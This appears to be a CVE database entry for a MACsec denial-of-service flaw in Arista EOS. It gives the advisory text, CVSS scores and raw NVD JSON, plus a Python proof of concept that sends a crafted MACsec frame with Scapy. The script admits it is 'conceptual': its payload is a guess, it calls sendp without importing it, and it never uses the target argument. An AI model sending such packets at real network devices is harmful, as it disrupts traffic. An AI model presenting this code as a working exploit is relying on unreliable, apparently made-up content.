CVE-2025-7048

Description

On affected platforms running Arista EOS with MACsec configuration, a specially crafted packet can cause the MACsec process to terminate unexpectedly. Continuous receipt of these packets with certain MACsec configurations can cause longer term disruption of dataplane traffic.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Arista EOS (具体版本需查阅官方安全公告)

运行MACsec配置的Arista平台

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-7048 PoC - Arista EOS MACsec DoS
# This PoC demonstrates sending a crafted packet to trigger MACsec process termination
# Note: Use only for authorized security testing

from scapy.all import Ether, IP, Raw
import socket

def create_crafted_macsec_packet():
    """
    Create a specially crafted packet to trigger MACsec process termination
    This is a conceptual PoC - actual packet structure may vary
    """
    # Construct Ethernet frame with MACsec EtherType
    # Common MACsec EtherTypes: 0x88E5 (IEEE 802.1AE)
    packet = Ether(dst="00:1c:73:xx:xx:xx", src="00:1c:73:yy:yy:yy", type=0x88E5)
    
    # Add malformed MACsec Secure Channel identifier
    # This may trigger the vulnerability in MACsec process
    packet = packet / Raw(load=b"\x00" * 32 + b"\xFF" * 16)
    
    return packet

def send_crafted_packet(target_ip, interface="eth0"):
    """
    Send the crafted packet to target device
    """
    packet = create_crafted_macsec_packet()
    print(f"[*] Sending crafted MACsec packet to {target_ip}")
    sendp(packet, iface=interface, verbose=1)
    print("[*] Packet sent - check if MACsec process is affected")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_7048_poc.py <target_ip> [interface]")
        sys.exit(1)
    
    target = sys.argv[1]
    iface = sys.argv[2] if len(sys.argv) > 2 else "eth0"
    
    send_crafted_packet(target, iface)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-7048
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-7048
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-7048/
[4] VulDB https://vuldb.com/cve/CVE-2025-7048
[5] https://www.arista.com/en/support/advisories-notices/security-advisory/23120-security-advisory-0132

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-7048", "sourceIdentifier": "[email protected]", "published": "2026-01-06T20:16:01.253", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "On affected platforms running Arista EOS with MACsec configuration, a specially crafted packet can cause the MACsec process to terminate unexpectedly. Continuous receipt of these packets with certain MACsec configurations can cause longer term disruption of dataplane traffic."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-805"}]}], "references": [{"url": "https://www.arista.com/en/support/advisories-notices/security-advisory/23120-security-advisory-0132", "source": "[email protected]"}]}}